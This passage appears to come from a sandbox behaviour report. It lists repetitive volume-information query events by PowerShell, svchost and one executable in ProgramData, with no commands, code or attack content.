Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\Program\iusb3mon.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
